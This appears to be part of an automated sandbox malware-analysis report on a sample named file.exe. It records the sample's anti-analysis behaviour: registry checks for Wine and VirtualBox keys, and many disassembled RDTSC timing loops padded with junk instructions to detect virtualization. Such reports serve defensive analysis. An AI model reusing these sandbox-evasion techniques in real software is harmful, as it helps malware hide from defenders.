Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8C2E second address: 9A8C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FEEE08A2317h 0x0000000d jmp 00007FEEE08A2310h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8C60 second address: 9A8C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jc 00007FEEE0EE3606h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 jng 00007FEEE0EE3608h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8DAB second address: 9A8DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FEEE08A2306h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9353 second address: 9A9364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEEE0EE360Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0E6 second address: 9AC0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0EA second address: 9AC0FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0FF second address: 9AC104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC104 second address: 9AC10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC10A second address: 9AC140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FEEE08A230Ah 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FEEE08A230Ch 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FEEE08A230Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC140 second address: 9AC146 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC2A0 second address: 9AC2C0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEEE08A230Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FEEE08A2306h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC2C0 second address: 9AC2D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEE0EE360Ch 0x00000008 jl 00007FEEE0EE3606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC2D8 second address: 9AC305 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEE08A2314h 0x00000008 jmp 00007FEEE08A230Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FEEE08A230Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC305 second address: 9AC30A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC30A second address: 9AC348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D19AAh], ecx 0x0000000e lea ebx, dword ptr [ebp+12459FE8h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FEEE08A2308h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC348 second address: 9AC34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC34D second address: 9AC352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC352 second address: 9AC358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC358 second address: 9AC365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC365 second address: 9AC36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC36B second address: 9AC370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC3D2 second address: 9AC435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007FEEE0EE360Ch 0x00000010 nop 0x00000011 clc 0x00000012 push 00000000h 0x00000014 call 00007FEEE0EE3609h 0x00000019 pushad 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edx 0x0000001e pushad 0x0000001f jmp 00007FEEE0EE360Ch 0x00000024 jmp 00007FEEE0EE360Eh 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f jc 00007FEEE0EE3606h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC435 second address: 9AC439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC439 second address: 9AC49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FEEE0EE3612h 0x00000011 pushad 0x00000012 jl 00007FEEE0EE3606h 0x00000018 jmp 00007FEEE0EE3618h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jmp 00007FEEE0EE3613h 0x00000027 push edx 0x00000028 push edx 0x00000029 pop edx 0x0000002a pop edx 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 pop edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC49D second address: 9AC4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC4A3 second address: 9AC504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D2D6Bh], edi 0x0000000f mov ecx, dword ptr [ebp+122D2948h] 0x00000015 push 00000003h 0x00000017 add edi, 0EF888E9h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FEEE0EE3608h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push esi 0x0000003a jmp 00007FEEE0EE3611h 0x0000003f pop esi 0x00000040 push 00000003h 0x00000042 mov dword ptr [ebp+122D26A1h], edi 0x00000048 push 9014A48Dh 0x0000004d push edi 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC6BD second address: 9AC6D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEEE08A2310h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC6D1 second address: 9AC719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007FEEE0EE361Bh 0x00000012 pushad 0x00000013 jmp 00007FEEE0EE3611h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 pushad 0x00000021 jg 00007FEEE0EE3606h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC719 second address: 9AC72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FEEE08A2306h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC72B second address: 9AC735 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEEE0EE3606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBA14 second address: 9CBA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBBE second address: 9CBBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEEE0EE3606h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBBCE second address: 9CBBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBFA3 second address: 9CBFC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE3612h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEEE0EE360Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBFC8 second address: 9CBFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2311h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC126 second address: 9CC130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD27 second address: 9CCD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD2B second address: 9CCD5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Eh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FEEE0EE3617h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD5F second address: 9CCD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEEE08A2306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD69 second address: 9CCD75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCEC0 second address: 9CCECA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEEE08A230Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF451 second address: 9CF46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE0EE3616h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF46C second address: 9CF472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF472 second address: 9CF476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF476 second address: 9CF47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFADF second address: 9CFAE9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEEE0EE360Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9A6 second address: 9CE9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE9AD second address: 9CE9B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CFDB2 second address: 9CFDB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 991169 second address: 991179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 ja 00007FEEE0EE3606h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7133 second address: 9D7142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FEEE08A2308h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7142 second address: 9D7173 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEEE0EE361Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEEE0EE3610h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7173 second address: 9D7177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7177 second address: 9D717B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D76F2 second address: 9D76F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D76F8 second address: 9D76FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF13 second address: 9DAF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF17 second address: 9DAF1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF1D second address: 9DAF45 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEEE08A2306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 791BE696h 0x00000013 mov edi, dword ptr [ebp+122D25FEh] 0x00000019 call 00007FEEE08A2309h 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push esi 0x00000022 pop esi 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DAF45 second address: 9DAFA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE0EE360Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEEE0EE360Fh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FEEE0EE360Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a jns 00007FEEE0EE361Eh 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FEEE0EE360Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB08A second address: 9DB090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DB294 second address: 9DB298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBB7E second address: 9DBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEEE08A2318h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBC88 second address: 9DBCA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEEE0EE360Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBD6F second address: 9DBD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBEED second address: 9DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DBFA5 second address: 9DBFAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC124 second address: 9DC13C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FEEE0EE3606h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jc 00007FEEE0EE360Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC67B second address: 9DC67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE7A second address: 9DCE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE7E second address: 9DCE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE8C second address: 9DCE90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE90 second address: 9DCE96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF555 second address: 9DF55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FEEE0EE3606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF5E8 second address: 9DF5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF2DD second address: 9DF2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF2E4 second address: 9DF312 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FEEE08A2306h 0x00000009 jmp 00007FEEE08A2313h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FEEE08A230Ch 0x0000001a jg 00007FEEE08A2306h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF312 second address: 9DF318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFED9 second address: 9DFEE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FEEE08A230Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF318 second address: 9DF31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E166C second address: 9E1670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1670 second address: 9E1676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1676 second address: 9E1698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEEE08A2318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F2A second address: 9E1F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F30 second address: 9E1F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1F34 second address: 9E1F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
